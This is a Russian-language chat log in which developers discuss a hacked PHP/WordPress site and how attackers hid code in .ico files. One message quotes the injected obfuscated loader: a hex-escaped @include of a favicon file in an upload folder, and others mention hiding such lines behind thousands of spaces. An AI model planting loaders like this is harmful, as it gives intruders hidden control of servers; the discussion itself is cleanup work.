Евгений
ну так запрети его исполнение
Владимир
КАК?
Евгений
вот тут тебе про нгинкс/апач и говорят )
Евгений
это там настраивается
Владимир
лол
Anonymous
то бишь в cli у тебя запускается файл lol.ico?
Владимир
Владимир
в этом участует только php
Евгений
как он это делает?
Евгений
include 'lol.ico'?
Владимир
Владимир
<?php
/*13eee*/
@include "\x2fva\x72/w\x77w/\x6bek\x73ho\x70.r\x75/w\x65b/\x75pl\x6fad\x2fib\x6coc\x6b/0\x39c/\x66av\x69co\x6e_0\x6591\x363.\x69co";
/*13eee*/
?>
Владимир
говори
Евгений
удалить эти файлы, закрыть папки от записи
Anonymous
Владимир
))
Владимир
Anonymous
не, не. то есть если я просто вставлю строку
Евгений
особенно в вп
Anonymous
"<?php echo "hui";?>", то он выполнится?
Anonymous
без инклуда этого ico
Евгений
ну вообще, обычно ищут и конопатят дырку, через которую были залиты эти файлы
Anonymous
Владимир
Владимир
пока ещё не спалил как это сделали
Владимир
вычисляю
Anonymous
Anonymous
А еще добавить тему про битриксы и будет прям супер highload
Anonymous
я просто понять пытаюсь. если через cli запустить, то это по идее ты должен сделать в коде так, чтобы эта хуйня у тебя обработалась как скрипт.
Anonymous
ну ты там картинку выводишь в поток или чо.
Anonymous
как, короче, сделать так, чтобы у тебя при запуске из терминала выполнился код из картинки. я просто не могу понять. может кто-нибудь пример накинуть?
Anonymous
ну так чо.
Евгений
Anonymous
типа залили и из броузера запустили потом?
Anonymous
это всё понятно. я это себе так и представляю.
Anonymous
у меня другой вопрос.
Anonymous
без инклуда можно?
Anonymous
ты напрямую инклудишь.
Anonymous
чтобы запустить его нужон доступ к терминалу опять-таки.
Евгений
Евгений
и так и делают
Евгений
эксплоиты, шеллы - всё вот так. инклудят и запускают
Anonymous
ну дык у тебя если в nginx прописано, что .ico отдавать как статику, то ничо не будет.
Евгений
эт если напрямую запрашивать lol.ico
Евгений
а если заинклудить его в какой-нить shell.php
Евгений
то всё работает
Anonymous
да, я понимаю. но эт получается, что либо ты сам где-то косякнул и его заинклудил, либо у тебя ребятки доступ имеют к серваку.
Anonymous
вот по твоему примеру.
Anonymous
по идее это нужно конректно php файл залить.
Anonymous
обычно на такие папки у www-data не должно быть прав)
Евгений
Anonymous
ааааа
Anonymous
бля, помню, прочитал в инете про инъекции. пытался сайт рудн уронить ахаххаа
Евгений
эти пидоры ещё делали перед инклудом пару тысяч пробелов
Anonymous
просто вставял в адресную строку 1=1
Евгений
то есть, в редакторе открываешь и не видишь нихуя
Евгений
т.к. 99% этих сайтов не под гитом
Евгений
там с фтп была связана дырка, на шареде можно было как-то попасть в папки других пользователей
Anonymous
Anonymous
а воще кто-нибудь знает готовое решение, чтобы запирать юзеров сервака в своих папках и при этом всё остальное не страдало?
Anonymous
чтобы ты выше своей домашней директории не мог прыгнуть
Anonymous
по типу шаредов
Anonymous
Anonymous
Евгений
а ссыль есть какая-нибудь почитать?
список уязвимостей вп например ) https://www.cvedetails.com/vulnerability-list.php?vendor_id=2337&product_id=4096&version_id=&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&month=0&cweid=0&order=1&trc=265&sha=f7e9f236634d1e8f8f1588d8b60868d41a0af790
Anonymous
Евгений
я точно сталкивался например с такой https://www.cvedetails.com/cve/CVE-2007-0233/
Евгений
через трэкбэк
Anonymous
Anonymous
Но так чисто интересно
Anonymous
Для общего развития
Anonymous
Чтобы самому не допускать такого дерьмеца
Евгений
там гигантский список, от всего не спасёшься )
Евгений
многое ведь не только для вп работает